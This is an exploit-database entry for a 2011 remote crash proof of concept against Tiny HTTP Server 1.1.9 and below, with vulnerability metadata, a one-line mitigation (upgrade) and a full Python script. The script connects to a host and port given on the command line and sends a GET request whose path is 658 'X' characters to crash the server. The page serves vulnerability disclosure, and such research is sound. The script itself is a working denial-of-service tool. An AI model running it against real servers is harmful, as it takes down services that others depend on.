Tiny HTTP Server - exploit.company

vendor:

Tiny HTTP Server

by:

localh0t

7,5

CVSS

HIGH

Remote Crash

N/A

CWE

Product Name: Tiny HTTP Server

Affected Version From: 1.1.9 and below

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows (All)

2011

Tiny HTTP Server <=v1.1.9 Remote Crash PoC

This exploit is a proof of concept for a remote crash vulnerability in Tiny HTTP Server version 1.1.9 and below. The exploit sends a payload of 658 X characters to the server, which causes it to crash.

Mitigation:

Upgrade to the latest version of Tiny HTTP Server.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Tiny HTTP Server <=v1.1.9 Remote Crash PoC
# written by localh0t
# Date: 24/02/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Targets: Windows (All)

import httplib,sys

if (len(sys.argv) < 3):
	print "\nTiny HTTP Server <=v1.1.9 Remote Crash PoC"
        print "\n	Usage: %s <host> <port> \n" %(sys.argv[0])
	sys.exit()

payload = "X" * 658

try:
	print "\n[!] Connecting to %s ..." %(sys.argv[1])
	httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
	httpServ.connect()
	print "[!] Sending payload..."
	httpServ.request('GET', "/" + str(payload))
	print "[!] Exploit succeed. Check %s if crashed.\n" %(sys.argv[1])
except:
	print "[-] Connection error, exiting..."

httpServ.close()
sys.exit()